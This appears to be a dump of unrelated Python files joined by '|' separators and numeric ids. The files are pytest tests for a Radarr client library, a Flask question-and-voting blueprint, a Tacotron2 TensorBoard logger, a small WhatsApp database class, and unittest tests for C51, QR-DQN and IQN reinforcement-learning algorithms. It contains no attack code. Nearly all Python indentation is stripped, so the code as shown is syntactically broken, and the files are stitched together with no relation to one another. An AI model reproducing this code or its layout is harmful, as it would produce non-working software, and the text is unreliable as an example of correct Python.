mock_base.assert_called_with(None)
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_item", return_value=[TEST_MOVIE])
def test_get_movie_with_id(mock_base, cli):
res = cli.get_movie(movie_id=1234)
mock_base.assert_called_with(1234)
assert res[0].title == "some movie"
assert res[0].year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.lookup_item", return_value=[TEST_MOVIE, TEST_MOVIE])
def test_lookup_movie_with_term(mock_base, cli):
res = cli.lookup_movie(term="some title")
mock_base.assert_called_with("some title")
assert res[0].title == "some movie"
assert res[0].year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.lookup_item", return_value=[TEST_MOVIE])
def test_lookup_movie_with_term_single_res(mock_base, cli):
res = cli.lookup_movie(term="some title")
mock_base.assert_called_with("some title")
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_imdb(mock_base, cli):
res = cli.lookup_movie(imdb_id="tt1234")
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/imdb", url_params={"imdbId": "tt1234"})
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_tmdb(mock_base, cli):
res = cli.lookup_movie(tmdb_id=1234)
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/tmdb", url_params={"tmdbId": 1234})
assert res.title == "some movie"
assert res.year == 2020
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIE)
def test_lookup_movie_with_all(mock_base, cli):
res = cli.lookup_movie(term="some title", tmdb_id=1234, imdb_id="tt1234")
mock_base.assert_called_with(f"{cli.api_url_itemlookup}/tmdb", url_params={"tmdbId": 1234})
assert res.title == "some movie"
assert res.year == 2020
def test_lookup_movie_with_noparam(cli):
with pytest.raises(RadarrCliError):
cli.lookup_movie()
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withpath(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/other_path/some_other_movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=1, tmdb_id=1234, path="some/other_path/some_other_movie")
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withtmdb(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=1, tmdb_id=1234)
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value=TEST_MOVIEINFO)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withimdb(mock_add, mock_root, mock_get, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 2,
"qualityProfileId": 2,
"monitored": True,
"addOptions": {"searchForMovie": True}
})
cli.add_movie(quality=2, imdb_id="tt1234")
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_root_folder", return_value=TEST_ROOT_PATH)
@patch("pycliarr.api.radarr.BaseCliMediaApi.add_item", return_value=TEST_JSON)
def test_add_movie_withinfo(mock_add, mock_root, cli):
exp = deepcopy(TEST_MOVIEINFO)
exp.update({
"title": "some movie",
"path": "some/path/some movie",
"profileId": 1,
"qualityProfileId": 1,
"monitored": False,
"addOptions": {"searchForMovie": False}
})
info = RadarrMovieItem(title="some movie")
cli.add_movie(quality=1, movie_info=info, monitored=False, search=False)
mock_add.assert_called_with(json_data=exp)
@patch("pycliarr.api.radarr.BaseCliMediaApi.request_get", return_value={})
def test_add_movie_noresults(mock_get, cli):
with pytest.raises(RadarrCliError):
cli.add_movie(quality=2, imdb_id="tt1234")
def test_add_movie_noparam(cli):
with pytest.raises(RadarrCliError):
cli.add_movie(quality=2)
@patch("pycliarr.api.radarr.BaseCliMediaApi.delete_item", return_value=TEST_JSON)
def test_delete_movie(mock_base, cli):
res = cli.delete_movie(1234)
mock_base.assert_called_with(1234, True, {})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi.delete_item", return_value=TEST_JSON)
def test_delete_movie_withoptions(mock_base, cli):
res = cli.delete_movie(1234, delete_files=False, add_exclusion=True)
mock_base.assert_called_with(1234, False, {"addExclusion": True})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_refresh_movies(mock_base, cli):
res = cli.refresh_movie()
mock_base.assert_called_with({"name": "RefreshMovie"})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_refresh_movie(mock_base, cli):
res = cli.refresh_movie(1234)
mock_base.assert_called_with({"name": "RefreshMovie", "movieId": 1234})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_rescan_movies(mock_base, cli):
res = cli.rescan_movie()
mock_base.assert_called_with({"name": "RescanMovie"})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi._sendCommand", return_value=TEST_JSON)
def test_rescan_movie(mock_base, cli):
res = cli.rescan_movie(1234)
mock_base.assert_called_with({"name": "RescanMovie", "movieId": 1234})
assert res == TEST_JSON
@patch("pycliarr.api.radarr.BaseCliMediaApi.build_item_path")
def test_build_movie_path_no_year(mock_buildpath, cli):
movie = RadarrMovieItem(title="some movie", year=0)
cli.build_movie_path(movie)
mock_buildpath.assert_called_with("some movie")
@patch("pycliarr.api.radarr.BaseCliMediaApi.build_item_path")
def test_build_movie_path_year(mock_buildpath, cli):
movie = RadarrMovieItem(title="some movie", year=2020)
cli.build_movie_path(movie, root_folder_id=3)
mock_buildpath.assert_called_with("some movie (2020)")
|
106113
|
from sqlalchemy import and_, or_, func
from datetime import datetime
from flask import Blueprint, request, make_response, render_template, flash, g, session, redirect, url_for, jsonify, abort, current_app
from flask.ext.babel import gettext
from dataviva import db, lm, view_cache
# from config import SITE_MIRROR
from dataviva.apps.user.models import User
from dataviva.apps.ask.models import Question, Reply, Status, Vote, TYPE_QUESTION, TYPE_REPLY, Flag
from dataviva.apps.ask.forms import AskForm, ReplyForm, SearchForm
from dataviva.utils.cached_query import cached_query, api_cache_key
import urllib2, urllib
mod = Blueprint('ask', __name__, url_prefix='/<lang_code>/ask')
RESULTS_PER_PAGE = 10
@mod.url_defaults
def add_language_code(endpoint, values):
values.setdefault('lang_code', g.locale)
@mod.url_value_preprocessor
def pull_lang_code(endpoint, values):
g.locale = values.pop('lang_code')
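# The endpoint below serves e.g. GET /en/ask/questions/?order=votes&type=question&offset=0
# and returns JSON of the form {"activities": [<serialized questions>]}.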
@mod.route('/questions/', methods=['GET', 'POST'], defaults={'page': 1})
def question_list(page):
# get URL parameters for results per page and ordering options
order = request.args.get('order', 'votes') # options = 'votes' or 'newest'
type = request.args.get('type', 'all') # options = 'all' or 'question' or 'comment' or 'contact'
offset = request.args.get('offset', 0)
search_term = request.args.get('q', None)
if search_term:
search_term = search_term.encode('utf-8')
limit = 25
lang = request.args.get('lang', None) or g.locale
    # let's find the questions to load on the page
# only the approved questions
approved = Status.query.filter_by(name='Approved').first()
questions = Question.query.filter_by(status = approved)
# if the user has submitted a search, filter by that term
if search_term:
like_str = "%{0}%".format(search_term)
questions = questions.filter(or_(Question.question.like(like_str),Question.body.like(like_str),Question.status_notes.like(like_str)))
if type == "question":
questions = questions.filter_by(type_id='1')
elif type == "comment":
questions = questions.filter_by(type_id='2')
elif type == "contact":
questions = questions.filter_by(type_id='3')
# if we are ordering the questions by newest get them ordered chronologically
if order == "newest":
if g.locale == "pt":
questions = questions.order_by(Question.timestamp.desc(),Question.language.desc())
else:
questions = questions.order_by(Question.timestamp.desc(),Question.language)
questions = questions.order_by(Question.timestamp.desc())
questions = questions.limit(limit).offset(offset)
questions = [q.serialize() for q in questions.all()]
# otherwise we are ordering the questions by votes
else:
questions = questions.limit(limit).offset(offset)
ids = [q.id for q in questions]
# raise Exception(ids)
votes_subq = db.session.query(Vote, func.count('*').label('vote_count')).group_by(Vote.type_id).subquery()
if lang == "pt":
questions = db.session.query(Question, votes_subq.c.vote_count) \
.outerjoin(votes_subq, and_(Question.id==votes_subq.c.type_id, votes_subq.c.type==TYPE_QUESTION)) \
.filter(Question.status == approved) \
.filter(Question.id.in_(ids)) \
.filter(Question.language==lang) \
.order_by(votes_subq.c.vote_count.desc(),Question.language.desc())
else:
questions = db.session.query(Question, votes_subq.c.vote_count) \
.outerjoin(votes_subq, and_(Question.id==votes_subq.c.type_id, votes_subq.c.type==TYPE_QUESTION)) \
.filter(Question.status == approved) \
.filter(Question.id.in_(ids)) \
.filter(Question.language==lang) \
.order_by(votes_subq.c.vote_count.desc(),Question.language)
# .limit(limit).offset(offset)
questions = [q[0].serialize() for q in questions]
ret = jsonify({"activities":questions})
ret.headers.add('Last-Modified', datetime.now())
ret.headers.add('Expires', '-1')
ret.headers.add('Cache-Control', 'must-revalidate, private')
return ret
@mod.route('/question/<slug>/vote/')
@mod.route('/question/<slug>/vote/<user>/')
def question_vote(slug, user=None):
q = Question.query.filter_by(slug=slug).first_or_404()
    # mirror check disabled: the SITE_MIRROR import is commented out above
    # if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
    #     g.user = User.query.get(user)
    if g.user is None or not g.user.is_authenticated:
        return jsonify({"error": gettext("You need to be logged in to vote.")})
    # elif user is None and g.user is None:
    #     abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/question/{1}/vote/{2}/".format(SITE_MIRROR,slug,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
vote = q.votes.filter_by(user=g.user).first()
if vote:
db.session.delete(vote)
db.session.commit()
return jsonify({"success": -1})
else:
new_vote = Vote(user=g.user, type=TYPE_QUESTION, type_id=q.id)
db.session.add(new_vote)
db.session.commit()
return jsonify({"success": 1})
@mod.route('/reply/<int:id>/vote/')
@mod.route('/reply/<int:id>/vote/<user>/')
def reply_vote(id, user=None):
reply = Reply.query.get_or_404(id)
# if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
# g.user = User.query.get(user)
if g.user is None or not g.user.is_authenticated:
return jsonify({"error": gettext("You need to be logged in to vote.")})
# elif user is None and g.user is None:
# abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/reply/{1}/vote/{2}/".format(SITE_MIRROR,id,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
vote = reply.votes.filter_by(user=g.user).first()
if vote:
db.session.delete(vote)
db.session.commit()
return jsonify({"success": -1})
else:
new_vote = Vote(user=g.user, type=TYPE_REPLY, type_id=reply.id)
db.session.add(new_vote)
db.session.commit()
return jsonify({"success": 1})
@mod.route('/reply/<int:id>/flag/')
@mod.route('/reply/<int:id>/flag/<user>/')
def reply_flag(id, user=None):
reply = Reply.query.get_or_404(id)
# if user and request.remote_addr == SITE_MIRROR.split(":")[1][2:]:
# g.user = User.query.get(user)
if g.user is None or not g.user.is_authenticated:
return jsonify({"error": gettext("You need to be logged in to flag replies.")})
# elif user is None and g.user is None:
# abort(404)
# if user is None:
# try:
# opener = urllib2.urlopen("{0}ask/reply/{1}/flag/{2}/".format(SITE_MIRROR,id,g.user.id),None,5)
# except:
# return jsonify({"error": gettext("The server is not responding. Please try again later.")})
flag = reply.flags.filter_by(user=g.user).first()
if flag:
db.session.delete(flag)
db.session.commit()
return jsonify({"success": -1})
else:
new_flag = Flag(user=g.user, reply_id=reply.id)
db.session.add(new_flag)
db.session.commit()
return jsonify({"success": 1})
|
106117
|
import random
import torch
from tensorboardX import SummaryWriter
from plotting_utils import plot_alignment_to_numpy, plot_spectrogram_to_numpy
from plotting_utils import plot_gate_outputs_to_numpy
class Tacotron2Logger(SummaryWriter):
def __init__(self, logdir, hparams):
super(Tacotron2Logger, self).__init__(logdir)
self.n_items = hparams.n_tensorboard_outputs
self.plotted_targets_val = False# validation/teacher-forcing
self.plotted_targets_inf = False# infer
self.best_loss_dict = None
def plot_loss_dict(self, loss_dict, iteration, prepend=''):
# plot datapoints/graphs
for loss_name, reduced_loss in loss_dict.items():
self.add_scalar(f"{prepend}/{loss_name}", reduced_loss, iteration)
def plot_model_params(self, model, iteration):
for tag, value in model.named_parameters():
tag = tag.replace('.', '/')
self.add_histogram(tag, value.data.cpu().numpy(), iteration)
def log_training(self, reduced_loss_dict, expavg_loss_dict, best_loss_dict, grad_norm, learning_rate, duration,
iteration, teacher_force_till, p_teacher_forcing, drop_frame_rate):
prepend = 'training'
if iteration%20 == 0:
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
if expavg_loss_dict is not None:
self.plot_loss_dict(expavg_loss_dict, iteration, f'{prepend}_smoothed')
if best_loss_dict is not None:
if self.best_loss_dict is None:
self.best_loss_dict = {k: 0. for k in best_loss_dict.keys()}
for loss_name, reduced_loss in best_loss_dict.items():# for each loss value in the dictionary
if self.best_loss_dict[loss_name] != reduced_loss or iteration%10000 == 0:# if loss has updated or changed since last time
self.best_loss_dict[loss_name] = reduced_loss
self.add_scalar(f'{prepend}_smoothed_best/{loss_name}', reduced_loss, iteration)# plot the new value
self.add_scalar("grad.norm", grad_norm, iteration)
if iteration%100 == 0:
self.add_scalar(f"{prepend}.learning_rate", learning_rate, iteration)
self.add_scalar(f"{prepend}/p_teacher_forcing" , p_teacher_forcing, iteration)
self.add_scalar(f"{prepend}/teacher_force_till", teacher_force_till, iteration)
self.add_scalar(f"{prepend}/drop_frame_rate", drop_frame_rate, iteration)
self.add_scalar(f"{prepend}.duration", duration, iteration)
def log_validation(self, reduced_loss_dict, reduced_bestval_loss_dict, model, y, y_pred, iteration, val_teacher_force_till, val_p_teacher_forcing):
prepend = 'validation'
# plot distribution of parameters
if iteration%20000 == 0:
self.plot_model_params(model, iteration)
# plot datapoints/graphs
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
self.plot_loss_dict(reduced_bestval_loss_dict, iteration, f'{prepend}_best')
# plot spects / imgs
n_items = min(self.n_items, y['gt_mel'].shape[0])
mel_L1_map = torch.nn.L1Loss(reduction='none')(y_pred['pred_mel_postnet'], y['gt_mel'])
mel_L1_map[:, -1, -1] = 5.0 # because otherwise the color map scale is crap
for idx in range(n_items):# plot target spectrogram of longest audio file(s)
self.add_image(
f"{prepend}_alignment/{idx}",
plot_alignment_to_numpy(y_pred['alignments'][idx].data.cpu().numpy().T),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_pred/{idx}",
plot_spectrogram_to_numpy(y_pred['pred_mel_postnet'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_SE/{idx}",
plot_spectrogram_to_numpy(mel_L1_map[idx].data.cpu().numpy()),
iteration, dataformats='HWC')
if not self.plotted_targets_val:
self.add_image(
f"{prepend}_mel_gt/{idx}",
plot_spectrogram_to_numpy(y['gt_mel'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.plotted_targets_val = True # target spect doesn't change so only needs to be plotted once.
def log_infer(self, reduced_loss_dict, reduced_bestval_loss_dict, model, y, y_pred, iteration, val_teacher_force_till, val_p_teacher_forcing):
prepend = 'inference'
# plot datapoints/graphs
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
self.plot_loss_dict(reduced_bestval_loss_dict, iteration, f'{prepend}_best')
# plot spects / imgs
n_items = min(self.n_items, y['gt_mel'].shape[0])
for idx in range(n_items):# plot target spectrogram of longest audio file(s)
self.add_image(
f"{prepend}_alignment/{idx}",
plot_alignment_to_numpy(y_pred['alignments'][idx].data.cpu().numpy().T),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_pred/{idx}",
plot_spectrogram_to_numpy(y_pred['pred_mel_postnet'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
if not self.plotted_targets_inf:
self.add_image(
f"{prepend}_mel_gt/{idx}",
plot_spectrogram_to_numpy(y['gt_mel'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.plotted_targets_inf = True # target spect doesn't change so only needs to be plotted once.
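# Typical wiring (names are assumptions, not from the original training script):
#   logger = Tacotron2Logger("outdir/logs", hparams)  # hparams.n_tensorboard_outputs caps plotted items
# then call logger.log_training(...) every iteration and logger.log_validation(...) /
# logger.log_infer(...) after each evaluation pass, and point TensorBoard at "outdir/logs".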
|
106131
|
from WhatsAppManifest.manifest.whatsapp.path import Path
from WhatsAppManifest.automator.whatsapp.database.base import WhatsAppDatabase
class WhatsAppDatabaseWA(WhatsAppDatabase):
"""
WhatsApp WA Database
"""
_database = Path.wa
|
106158
|
from flare.algorithm_zoo.distributional_rl_algorithms import C51
from flare.model_zoo.distributional_rl_models import C51Model
from flare.algorithm_zoo.distributional_rl_algorithms import QRDQN
from flare.model_zoo.distributional_rl_models import QRDQNModel
from flare.algorithm_zoo.distributional_rl_algorithms import IQN
from flare.model_zoo.distributional_rl_models import IQNModel
import numpy as np
import math
import torch
import torch.nn as nn
import unittest
class TestC51(unittest.TestCase):
def initialize(self, bins=2):
inner_size = 256
num_actions = 3
state_shape = [1]
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
model = C51Model(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
vmax=10,
vmin=-10,
bins=bins)
alg = C51(model=model,
exploration_end_steps=500000,
update_ref_interval=100)
return model, alg
def test_select_q_distribution(self):
model, alg = self.initialize()
distribution = [[[0.1, 0.9], [0.2, 0.8], [0.3, 0.7]],
[[0.4, 0.6], [0.5, 0.5], [0.6, 0.4]]]
action = [0, 2]
expected = np.array(
[d[a] for d, a in zip(distribution, action)]).flatten()
actual = alg.select_q_distribution(
torch.tensor(distribution), torch.tensor(action)).numpy().flatten()
self.assertEqual(len(expected), len(actual))
for x, y in zip(expected, actual):
self.assertAlmostEqual(x, y)
def test_check_alive(self):
model, alg = self.initialize(3)
values = [[[1, 2, 3]] * 2, [[3, 4, 5]] * 2, [[5, 6, 7]] * 2]
alive = [1, 0, 1]
next_values = torch.tensor(values).float()
next_alive = torch.tensor(alive).float().view(-1, 1)
expected = [
a if b == 1 else [[0, 1, 0]] * 2 for a, b in zip(values, alive)
]
expected = np.array(expected)
actual = alg.check_alive(next_values, next_alive).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y)
def one_backup(self, r, q, discount, model):
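        # Reference categorical (C51) projection: each shifted atom Tz = r + discount * z_j
        # is clipped to the support [-10, 10] and its probability mass q[j] is split between
        # the two neighbouring support atoms in proportion to distance.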
N = len(q)
m = [0.] * N
        for j in range(N):
Tz = r + discount * model.atoms[j]
Tz = min(Tz, 10)
Tz = max(Tz, -10)
b = (Tz + 10.) / model.delta_z
l = int(math.floor(b))
u = int(math.ceil(b))
m[l] += q[j] * (u - b)
m[u] += q[j] * (b - l)
return m
def test_backup(self):
model, alg = self.initialize()
discount = 0.9
reward = [[1.5], [-0.2], [0.]]
next_q_distribution = [[0.1, 0.9], [0.2, 0.8], [0.3, 0.7]]
expected = np.array([
self.one_backup(r[0], q, discount, model)
for r, q in zip(reward, next_q_distribution)
]).flatten()
actual = alg.backup(
model.atoms,
torch.FloatTensor([model.vmax]),
torch.FloatTensor([model.vmin]), model.delta_z,
torch.tensor(reward), discount,
torch.tensor(next_q_distribution)).numpy().flatten()
self.assertEqual(len(expected), len(actual))
for x, y in zip(expected, actual):
self.assertAlmostEqual(x, y)
def test_get_current_values(self):
model, alg = self.initialize()
A = "A"
B = "B"
alg.model.value = lambda x, y: (x, y)
A_hat, B_hat = alg.get_current_values(A, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
def test_get_next_values(self):
model, alg = self.initialize()
A = "A"
B = "B"
C = {"q_value": A}
alg.ref_model.value = lambda x, y: (x, y)
C_hat, B_hat, A_hat = alg.get_next_values(C, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
self.assertEqual(C, C_hat)
class TestQRDQN(unittest.TestCase):
def initialize(self, bins=2):
inner_size = 256
num_actions = 3
state_shape = [1]
N = 32
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
alg = QRDQN(
model=QRDQNModel(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
N=N),
exploration_end_steps=500000,
update_ref_interval=100)
return alg
def test_check_alive(self):
alg = self.initialize()
values = [[[1], [2], [3]], [[3], [4], [5]], [[5], [6], [7]]]
alive = [1, 0, 1]
next_values = torch.tensor(values).float()
next_alive = torch.tensor(alive).float().view(-1, 1)
expected = [
a if b == 1 else [[0], [0], [0]] for a, b in zip(values, alive)
]
expected = np.array(expected)
actual = alg.check_alive(next_values, next_alive).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y)
def huber_loss(self, u, k=1):
if abs(u) <= k:
return 0.5 * u * u
else:
return k * (abs(u) - 0.5 * k)
def quantile_huber_loss(self, u, tau, k=1):
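        # reference quantile Huber loss: |tau - 1{u < 0}| * huber_loss(u, k), the
        # asymmetric weighting used in QR-DQN's quantile regression objective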
        delta = 1 if u < 0 else 0
return abs(tau - delta) * self.huber_loss(u, k)
    def expectation_quantile_huber_loss(self, theta, Ttheta, tau, k=1):
r1 = 0
for theta_i, tau_i in zip(theta, tau):
r2 = 0
for Ttheta_j in Ttheta:
r2 += self.quantile_huber_loss(Ttheta_j - theta_i, tau_i, k)
r1 += r2 / len(Ttheta)
return r1
    def batch_expectation_quantile_huber_loss(self,
                                              q_distribution,
                                              critic_value,
                                              tau,
                                              k=1):
expected = []
for theta, Ttheta, t in zip(q_distribution, critic_value, tau):
expected.append(
                self.expectation_quantile_huber_loss(theta, Ttheta, t, k))
return expected
def test_get_quantile_huber_loss(self):
alg = self.initialize()
critic_value = [[-1., 2.], [3., 4.], [-5., -5.]]
q_distribution = [[9., 8.5], [7., 6.], [-5., -5.]]
tau = [[0.3, 0.6], [0.4, 0.8], [0.6, 0.1]]
        expected = self.batch_expectation_quantile_huber_loss(
q_distribution, critic_value, tau, k=1)
expected = np.array(expected)
critic_value = torch.tensor(critic_value)
q_distribution = torch.tensor(q_distribution)
tau = torch.tensor(tau)
actual = alg.get_quantile_huber_loss(critic_value, q_distribution,
tau).view(-1).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y, places=6)
class TestIQN(unittest.TestCase):
def initialize(self):
inner_size = 256
num_actions = 3
state_shape = [1]
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
model = IQNModel(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
inner_size=inner_size)
alg = IQN(model=model,
exploration_end_steps=500000,
update_ref_interval=100)
return alg
def test_get_current_values(self):
alg = self.initialize()
A = "A"
B = "B"
N = 10
alg.model.value = lambda x, y, z: (x, y, z)
alg.N = N
A_hat, B_hat, N_hat = alg.get_current_values(A, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
self.assertEqual(N, N_hat)
def tdest_get_next_values(self):
alg = self.initialize()
next_values = "A"
next_value = "B"
next_states_update = "C"
a_list = [next_values, {"q_value": next_value}]
alg.ref_model.value = lambda x, y, z: (x, y, z)
A_hat, B_hat, C_hat = alg.get_next_values(a_list, next_states_update)
self.assertEqual(next_values, A_hat)
self.assertEqual(next_states_update, B_hat)
self.assertEqual(next_value, C_hat)
if __name__ == "__main__":
unittest.main()
|